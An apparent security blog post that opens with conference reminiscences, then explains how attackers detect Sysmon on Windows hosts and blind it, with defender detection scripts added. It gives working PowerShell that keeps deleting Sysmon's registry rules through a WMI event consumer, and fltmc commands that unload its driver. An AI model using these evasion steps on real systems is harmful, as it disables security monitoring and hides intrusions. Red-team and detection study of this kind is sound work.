Shell is Only the Beginning - Sharing my thoughts

Recently, while in the bar of the Crowne Plaza in Heidelberg for the Troopers conference, I became aware of how grateful I should be for what I have in this industry. What I’m grateful for is not anything technical or recognition, but the group of people in the industry I have the honor to call friends.

I would like to share some of them in this blog post. While coming back from dinner in Heidelberg, JD, also known as @SadProcessor, sent me a DM that several of our friends were at the hotel bar and, even though I don't drink, I should come down and hang out. I was jet-lagged but had not seen many of them in months, so I said to myself “Why not” and went down.

Let me start with JD; he is one of the most humble persons I know, and his love for his kids rivals my own for mine. He was one of the main reasons that I loved the conference so much: he helped me navigate the conference and the foreign languages, and we talked about our passion for technology, PowerShell and much, much more. We had some heart-to-heart talks and always greeted and parted ways with a hug. He is a true professional and a great human being.

When I came into the bar I was immediately greeted by the professional tag team that created BloodHound, @Wald0 (Andy) and @CptJesus (Rohan); these two guys are awesome. While at a previous conference I got some bad news over the phone that crushed my energy levels. These two guys pulled me from my rut with the help of my good co-worker and friend Oddvar and took me to karaoke for the first time in my life. Rohan and I share a dark sense of humor, and I really wish I could have his comedic timing in my presentations in addition to his technical skills. Both are very professional and caring people. What I admire the most about Andy is his dedication to the community, from always typing personal welcome messages into the BloodHound Slack for new members, to helping others through his projects to help charity.

@harmj0y is next, “The Sexy Will Harmj0y” as I called him in my dark comedic way during class when referencing his tools. I have not met anyone else in this industry with his level of passion and determination when researching a subject. He and I spent some time talking about the industry, Kerberos, DPAPI and many other subjects. I met Will many years ago in Maryland, and from that time to now I’m amazed at the level of expertise he has built in multiple subjects through hard work.

@Tifink_ (Lee Christensen) is the quiet one of the group but one of the most skilled people I know. We chatted quite a bit on tradecraft, and I admire his ability to think out of the box. I have not met one single person in the SpecterOps crew who has not told me a story of how they have been stuck on something and Lee has come up with a solution. A true master of thinking outside the box.

@Pytotek3 (Sean Metcalf) of ADSecurity.org is next. He has been a friend for many, many years; I admire his warm heart, his always positive attitude, the impeccable work ethic that pushes me to be a better presenter, and his passion to share knowledge. I have to say his hugs rival those of Dave Kennedy. I'm honored to call him a close friend.

@JaredHaigh (Jared Haight) was returning to the hotel; I had dinner with him earlier, along with his wife and @CuriousJack (Jason Lang), a coworker and friend. Jared has to be one of the most humble and caring professionals I know in this industry. His positive attitude is matched by his technical skills. After Maria, he and some friends from SpecterOps and Microsoft sent a care package to my family; I will always be grateful to all of them for that.

@gentilkiwi (Benjamin Delpy): what can I say, this guy is simply awesome. We went into deep discussions on Kerberos, DPAPI, not commonly known capabilities of Mimikatz, shared our similar views on disclosure and release of tools, dev labs and much more. I am planning on doing a Mimikatz and Kekeo training this year, and he has always been available to help, clarify doubts and answer questions. He is another humble member of our community who truly cares about making the world a more secure place.

@FuzzzyNoise (Kelly) is a member of the SpecterOps crew and a lady that I now admire greatly. She shows a passion for the work, sharing and building up the community like no other I have seen. I was honored to spend time chatting with her.

Now, these are only a handful of the people I got to talk to that night. But they are the ones I reminisce about the most when I think of the positive impact their personalities and presence brought. We complain many times about the community, but rarely do we focus on those close to us who are part of our tribe and have influence upon us. At the bar that night I looked around me and felt honored to be in their presence and grateful for the company. Many of them in their own way had an influence on how I thought and viewed things for many years. I’m grateful for the company, for the learning and most of all for the passion they have for sharing and working to make everyone more secure.

In the rest of the week there were more people, from Rachelle, who wielded her organizational magic to make Troopers happen, to the speakers I got to talk to, the Twitter friends I got to meet in person and the great students in the class. The class was a small one, and I got to know most of them well and felt so proud of the opportunity to share some information with them.



Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog posts; I even wrote a PowerShell module called Posh-Sysmon to help with the generation of configuration files for it. Its main purpose is the tracking of potentially malicious activity on individual hosts, and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host and saves its information into the Windows event log, so it is easier to collect the information with SIEM (Security Information and Event Management) tools.

Sysmon has the capability to log information for:

  • Process creation and termination
  • Process changing a file creation time
  • Network connection
  • Driver load
  • Image load
  • CreateRemoteThread
  • Raw access read of a file
  • A process opening another process's memory
  • File creation
  • Registry events
  • Pipe events
  • WMI permanent events

All of the logging is based on rules you specify using the sysmon.exe tool, which are saved into the registry. Most enterprise environments will deploy Sysmon via package management and then push rules by writing the binary blob into the registry on the hosts.

Detect Control

As offensive operators, the first thing we need to do is identify whether Sysmon is present on the system. Normally, installing Sysmon on a system creates a service that loads a driver, the registry key that stores the configuration for the service and the driver, and an event manifest that defines the events and creates the event log where the generated events are written so they can be collected. So we have multiple places we can look. But sadly, most attackers are creatures of habit and will many times stick to the simplest solution that gives them the most bang for the buck. Detecting controls is no different; most will perform one of the following actions:

  • List processes

  • List services

  • List drivers in C:\Windows\System32\Drivers

The most common one is listing drivers, since EDR solutions like Cylance will hide the service name depending on how you call it, and some solutions do not have processes running.

For this very reason Sysmon implements a feature where you can change the name of the executable and the driver so as to obfuscate its presence on the system.

To change the name of the service and the process you just rename the Sysmon executable to whatever name you want. This is useful, but as we can see in the output below, the driver is not renamed.

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i
System Monitor v8.00 - System activity monitor
Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier
Sysinternals - www.sysinternals.com

HPPrinterController installed.
SysmonDrv installed.
Starting SysmonDrv.
SysmonDrv started.
Starting HPPrinterController..
HPPrinterController started.

To change the driver name we need to specify it with the -d parameter during installation and give it a name.

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i -d hpprndrv


System Monitor v8.00 - System activity monitor
Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier
Sysinternals - www.sysinternals.com

HPPrinterController installed.
hpprndrv installed.
Starting hpprndrv.
hpprndrv started.
Starting HPPrinterController..
HPPrinterController started.

One thing to take into account: to uninstall or update the configuration of the service, one has to use a copy of Sysmon with the name we chose, and the registry path for the configuration will also use the name we chose. This is very important during regular operation when upgrading Sysmon and pushing out new rules.

We can still look at the filter drivers that have been loaded by the system and at their altitude numbers using fltmc.exe, or, if the agent we are using is Meterpreter, Beacon or any other with support for Mimikatz, we can use Mimikatz with the command misc::mflt to list the driver altitude numbers in memory. The Sysmon driver will have an altitude number of 385201.

With Mimikatz

mimikatz # misc::mflt
0 3     385201 hpprndrv
0 0     244000 storqosflt
0 1     189900 wcifs
0 0     180451 CldFlt
0 0     141100 FileCrypt
0 1     135000 luafv
0 1      46000 npsvctrig
0 3      40700 Wof
0 4      40500 FileInfo

With fltMC.exe:

PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
hpprndrv                                3       385201         0
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0

If we are operating in a more contested or non-permissive environment where running fltmc.exe or loading Mimikatz is bound to raise alarms, a less accurate way is to check for the presence of the Sysmon event log. It will at least let us know that Sysmon is present or was installed on the system. For this we can check the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational.

PS C:\> ls HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels | Where-Object {$_.name -like "*sysmon*"}


    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels


Name                           Property
----                           --------
Microsoft-Windows-Sysmon/Opera OwningPublisher : {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
tional                         Enabled         : 1
                               Isolation       : 2
                               ChannelAccess   : O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x1;;;BO)(A;;0x1;;;SO)(A;;0x1;;;S-1-5-32-573)
                               MaxSize         : 67108864
                               MaxSizeUpper    : 0
                               Type            : 1

Another sign we can look for in the registry is the key that all Sysinternals tools populate to record that the license was accepted for the tool. In the case of Sysmon it will be listed under HKCU\Software\Sysinternals for the user who ran it.

PS C:\> ls HKCU:\Software\Sysinternals  | Select-Object name

Name
----
HKEY_CURRENT_USER\Software\Sysinternals\Process Explorer
HKEY_CURRENT_USER\Software\Sysinternals\Process Monitor
HKEY_CURRENT_USER\Software\Sysinternals\sigcheck
HKEY_CURRENT_USER\Software\Sysinternals\Streams
HKEY_CURRENT_USER\Software\Sysinternals\Strings
HKEY_CURRENT_USER\Software\Sysinternals\System Monitor
HKEY_CURRENT_USER\Software\Sysinternals\ZoomIt

There is also a way to find the service and know whether it was renamed. Sysmon keeps the description of the service as “System Monitor service” even when the name is modified. This makes it trivial to identify the service by this string using WMI or sc.exe.

PS C:\> Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"

ProcessId Name                StartMode State   Status ExitCode
--------- ----                --------- -----   ------ --------
2220      HPPrinterController Auto      Running OK     0
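
The indicators above (service description, event channel registration, minifilter altitude and the Rules value under the driver's Parameters key) can be combined into one health check that a defender can run to confirm a renamed Sysmon deployment is still present and active. The following is an added example, not code from the original post or from Sysinternals; the altitude value 385201 comes from the text, while the 'Healthy' rule and the field names are my own assumptions.

```powershell
# Added example: audit Sysmon presence from several independent indicators,
# so a renamed binary or driver does not hide a broken deployment.
function Get-SysmonPresence {
    [CmdletBinding()]
    param(
        # Altitude registered by the Sysmon minifilter, as shown by fltmc.exe
        [string]$SysmonAltitude = '385201'
    )

    $result = [ordered]@{}

    # 1. The service keeps its description regardless of the executable name
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Description = 'System Monitor service'"
    $result.ServiceName  = if ($svc) { $svc.Name }  else { $null }
    $result.ServiceState = if ($svc) { $svc.State } else { $null }

    # 2. Event channel registered by the Sysmon manifest (the key name contains a
    #    forward slash, so enumerate the parent key instead of using Test-Path)
    $channelsKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels'
    $channel = Get-ChildItem -Path $channelsKey -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -like 'Microsoft-Windows-Sysmon*' }
    $result.ChannelRegistered = [bool]$channel

    # 3. Minifilter loaded at the Sysmon altitude; the name may have been changed with -d
    $filterName = $null
    $fltLines = & fltmc.exe filters 2>$null
    foreach ($line in $fltLines) {
        # Columns: Filter Name, Num Instances, Altitude, Frame
        $fields = @(($line -split '\s+') | Where-Object { $_ -ne '' })
        if ($fields.Count -ge 3 -and $fields[2] -eq $SysmonAltitude) {
            $filterName = $fields[0]
        }
    }
    $result.FilterName = $filterName

    # 4. Rules blob under the driver's Parameters key (the path follows the driver name)
    $result.RulesBytes = 0
    if ($filterName) {
        $paramKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$filterName\Parameters"
        $rules = Get-ItemProperty -Path $paramKey -Name Rules -ErrorAction SilentlyContinue
        if ($rules) { $result.RulesBytes = ([byte[]]$rules.Rules).Length }
    }

    # Assumed health rule: running service, registered channel and a loaded filter
    $result.Healthy = [bool]($svc -and $svc.State -eq 'Running' -and
                             $result.ChannelRegistered -and $filterName)

    [pscustomobject]$result
}

Get-SysmonPresence | Format-List
```

Run it elevated so the Parameters key and fltmc.exe output are readable; a RulesBytes value of 0 with Healthy set to true means Sysmon is running on its default configuration rather than the pushed rule set.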

Circumventing Sysmon

Working Around Rules

We have two options to circumvent Sysmon: the first one is to operate inside the blind spots of its rule set, the second is to disable it completely. Matt Graeber was able to reverse engineer and make public the format of the registry key. A .NET assembly written by HarmJ0y called Seatbelt (https://github.com/GhostPack/Seatbelt) can be loaded in memory from Cobalt Strike to read the config, or, if we pull the registry key, Matt has a PowerShell function to parse it (https://github.com/mattifestation/PSSysmonTools/blob/master/PSSysmonTools/Code/SysmonRuleParser.ps1). By knowing the rules, we can operate around them.

Deleting Configuration

We can clear the rule entry in the registry. Sysmon will see the registry being changed and will automatically reload the configuration; since no rules are present, it will be blinded temporarily, and for how long depends on how the configuration is maintained. If the configuration is managed by a configuration management system like Ansible, Chef or DSC, it could be a matter of seconds to minutes before the configuration is changed back to its original state; if it is set by a GPO, it can be restored within 90 minutes when the GPO refreshes. To combat this we can create, in any Windows technology (.NET, VBS, PE file, etc.), a WMI temporary consumer (https://docs.microsoft.com/en-us/windows/desktop/wmisdk/receiving-a-wmi-event) that will monitor the registry key and, when it notices a change, delete it or set its content again. The reason for a temporary consumer is that most solutions look for WMI permanent events being created or modified.

$query = "SELECT * FROM RegistryKeyChangeEvent " + 
    "WHERE Hive ='HKEY_LOCAL_MACHINE' " + 
    "AND KeyPath ='SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters'"

Register-WMIEvent -Query $query -Action { 
    Write-host "Sysmon config updated, deleting config."
    Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters" -Name "Rules" }  

One thing to keep in mind is that Sysmon will revert to its default configuration, so it will still log the process creation and process termination events.
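
From the defender's side, the rule-deletion technique above leaves two traces that can be checked on a schedule: the Rules value under the driver's Parameters key no longer matches the approved blob (or is missing, meaning Sysmon fell back to its defaults), and Sysmon itself writes an Event ID 16 (ServiceConfigurationChange) each time the configuration is reloaded. The following is an added example, not code from the original post; the driver name, the lookback window and the baseline hash are assumptions, and the baseline has to be captured once right after the approved configuration has been pushed.

```powershell
# Added example: compare the stored Rules blob against a known-good SHA-256
# and count recent Sysmon configuration-change events (Event ID 16).
function Test-SysmonRulesIntegrity {
    [CmdletBinding()]
    param(
        # 'SysmonDrv' is the default; an install with -d uses the chosen name
        [string]$DriverName = 'SysmonDrv',
        # Hex SHA-256 of the Rules value recorded after deploying the approved config
        [Parameter(Mandatory)][string]$BaselineSha256,
        [int]$LookbackHours = 24
    )

    $paramKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$DriverName\Parameters"
    $rules = Get-ItemProperty -Path $paramKey -Name Rules -ErrorAction SilentlyContinue

    if (-not $rules) {
        # No Rules value: Sysmon is running its default (process create/terminate) config
        $status      = 'Missing'
        $currentHash = $null
    } else {
        $sha = [System.Security.Cryptography.SHA256]::Create()
        $currentHash = ([System.BitConverter]::ToString($sha.ComputeHash([byte[]]$rules.Rules))).Replace('-', '')
        $status = if ($currentHash -eq $BaselineSha256.ToUpperInvariant()) { 'Match' } else { 'Tampered' }
    }

    # Event ID 16 is written whenever Sysmon reloads its configuration
    $since   = (Get-Date).AddHours(-$LookbackHours)
    $changes = @(Get-WinEvent -FilterHashtable @{
            LogName   = 'Microsoft-Windows-Sysmon/Operational'
            Id        = 16
            StartTime = $since
        } -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        DriverName    = $DriverName
        RulesStatus   = $status
        CurrentSha256 = $currentHash
        ConfigChanges = $changes.Count
        LastChange    = if ($changes.Count) { $changes[0].TimeCreated } else { $null }
    }
}

# Usage: the baseline below is a placeholder; record the real value after deployment
Test-SysmonRulesIntegrity -DriverName 'SysmonDrv' -BaselineSha256 ('00' * 32)
```

A 'Tampered' or 'Missing' status combined with an Event ID 16 that was not produced by your configuration-management run is the signal to re-push the rules and look at what else happened on the host in that window.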

Unload SysmonDrv Filter Driver

Another action that can be taken is to unload the SysmonDrv filter driver, which gives Sysmon the information on all disk actions that it then writes to the event log. As we saw before, this driver has a unique altitude number, and if we are running as administrator we can unload it, at which point Sysmon is essentially blinded completely. We can unload the driver with the fltmc.exe tool. Here we are unloading our hidden driver that we identified via the altitude number.

PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
hpprndrv                                3       385201         0
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0
PS C:\> fltMC.exe unload hpprndrv
PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0

Sysmon will actually log the execution of this command as its last event, so fltmc.exe being executed with the unload parameter could be a trigger in the SIEM.
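
The last event Sysmon emits before the driver goes away is the process creation record (Event ID 1) for fltmc.exe, so a detection can key on that command line. The following is an added example, not code from the original post: it scores a command line as 'Critical' when the unloaded filter is the Sysmon driver (default or renamed) and 'Suspicious' for any other filter unload or detach, runs that logic over a few constructed sample records, and shows the same check against the live Sysmon channel. The sample records, the driver name 'hpprndrv' and the severity labels are assumptions.

```powershell
# Added example: flag minifilter unload/detach commands in process-creation data.
function Test-FilterUnloadCommand {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        # Name of the Sysmon driver as listed by fltmc.exe (default or renamed)
        [string]$SysmonDriverName = 'SysmonDrv'
    )
    # Matches: [path\]fltmc[.exe]["] <unload|detach> <filtername>, case-insensitive
    if ($CommandLine -match '(?i)\bfltmc(\.exe)?["'']?\s+(unload|detach)\s+(\S+)') {
        $target = $Matches[3].Trim('"')
        if ($target -ieq $SysmonDriverName) { return 'Critical' }
        return 'Suspicious'
    }
    return $null
}

function Find-FilterUnloadEvents {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [string]$SysmonDriverName = 'SysmonDrv'
    )
    foreach ($e in $Events) {
        $severity = Test-FilterUnloadCommand -CommandLine $e.CommandLine -SysmonDriverName $SysmonDriverName
        if ($severity) {
            [pscustomobject]@{ Time = $e.Time; User = $e.User; Severity = $severity; CommandLine = $e.CommandLine }
        }
    }
}

# Constructed sample of Sysmon Event ID 1 fields, as a SIEM might present them
$sampleEvents = @(
    [pscustomobject]@{ Time = '2019-03-20T21:14:05'; User = 'LAB\carlos'; CommandLine = 'fltMC.exe unload hpprndrv' }
    [pscustomobject]@{ Time = '2019-03-20T21:14:06'; User = 'LAB\carlos'; CommandLine = 'fltMC.exe' }
    [pscustomobject]@{ Time = '2019-03-20T21:20:11'; User = 'LAB\admin';  CommandLine = '"C:\Windows\System32\fltmc.exe" detach luafv C:' }
    [pscustomobject]@{ Time = '2019-03-20T21:25:00'; User = 'LAB\carlos'; CommandLine = 'notepad.exe unload.txt' }
)

# Offline run: first record is Critical, third is Suspicious, the others are ignored
Find-FilterUnloadEvents -Events $sampleEvents -SysmonDriverName 'hpprndrv' | Format-Table -AutoSize

# Live variant against the Sysmon channel; CommandLine is read from the event XML by name
function Find-FilterUnloadEventsLive {
    param([string]$SysmonDriverName = 'SysmonDrv', [int]$LookbackHours = 24)
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1
        StartTime = (Get-Date).AddHours(-$LookbackHours)
    } -ErrorAction SilentlyContinue
    $records = foreach ($ev in $events) {
        $xml  = [xml]$ev.ToXml()
        $data = $xml.Event.EventData.Data
        [pscustomobject]@{
            Time        = $ev.TimeCreated
            User        = ($data | Where-Object { $_.Name -eq 'User' }).'#text'
            CommandLine = ($data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
        }
    }
    if ($records) { Find-FilterUnloadEvents -Events @($records) -SysmonDriverName $SysmonDriverName }
}
```

Because the driver is gone once the unload completes, this event will be the last thing the host forwards; a sudden silence from a host right after a 'Critical' hit is the second half of the signal and is worth alerting on in its own right.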

Conclusion

When identifying controls in an adversarial simulation, look for more than one indicator of the presence of the control, and once it is identified, pull the pertinent pieces of information that will tell us the level of maturity and skill of the team defending the targeted network.

As always, I hope you find this blog post useful and informative. 
